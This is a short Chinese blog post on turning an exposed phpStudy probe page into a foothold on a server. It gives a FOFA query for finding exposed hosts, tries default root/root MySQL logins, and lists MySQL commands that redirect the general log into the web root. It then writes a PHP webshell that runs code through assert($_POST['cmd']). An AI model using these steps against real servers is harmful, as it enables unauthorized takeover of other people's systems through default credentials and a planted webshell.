php探针到上线的全过程

今天研究点比较low的东西，比如php探针到上线，哈哈哈哈，水起来

这个也是看到别的大佬的文章，然后自己去做了一遍发现可行，过程比较简单，由于个人安全问题，下面放出的过程不会很完整。

第一还是要去搜索一个php探针，body="phpstudy探针" && title="phpStudy 探针 2014"（fofa真牛鼻）

然后随便找一个，拉到最下面，root/root尝试连接mysql

 

 

 

出现上面那个图片那就很完美了，然后我们这样：

 

 访问到这个url然后，就可以开始操作了。

show variables like 'general_log'; -- 查看日志是否开启

set global general_log=on; -- 开启日志功能

show variables like 'general_log_file'; -- 看看日志文件保存位置

set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置

show variables like 'log_output'; -- 看看日志输出类型 table或file

set global log_output='table'; -- 设置输出类型为 table

set global log_output='file'; -- 设置输出类型为file

 

 

 两条命令搞定一切：

第一条：set global general_log=on;

第二条：set global general_log_file='tmp/general.lg';   logfile的是网站绝对路径，比如d:/www/xxx.php

设置完之后，就可以写一个webshell了

select'<?php assert($_POST["cmd"]);?>';

当你select之后就会产生日志，存放到那个log文件中

使用shell管理工具就可以进行链接了。